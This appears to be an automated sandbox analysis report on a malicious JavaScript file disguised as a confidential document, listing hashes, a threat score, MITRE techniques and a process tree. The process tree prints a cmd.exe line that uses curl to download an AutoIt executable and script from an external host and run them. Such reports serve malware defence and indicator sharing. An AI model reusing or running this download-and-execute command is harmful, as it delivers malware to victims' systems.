d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
121s
max time network
134s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
18-10-2023 07:18

Target

Redefining_Our_Structural_Canvas_2023_Confidential.js
Size

50KB
MD5

6e0b712bbd5e1a3ee9eb2098cadf0a90
SHA1

53697a5a284e0584181e3c3d4303cded6e58f2f2
SHA256

ac61469d96805f9590d80397ed8fca735b718c000026ff5d99672c791d4707b7
SHA512

55d1197aba1a398719a0d33c16ed25f757f4f6d4ea11a3870ebbd96ae3530e1064e3885f0ad8cbfd540829e989abc9ac463d5ed36044af4db5ee1b3fce8a41d9
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3WSLbsX6:nAIMFFdYMxAcEQDn

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 1196	1968	wscript.exe	28
PID 1968 wrote to memory of 1196	1968	wscript.exe	28
PID 1968 wrote to memory of 1196	1968	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Redefining_Our_Structural_Canvas_2023_Confidential.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o jgeyvf.au3 http://hgfdytrywq.com:80/msizpmaofse & Autoit3.exe jgeyvf.au3
  2⤵
  PID:1196

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact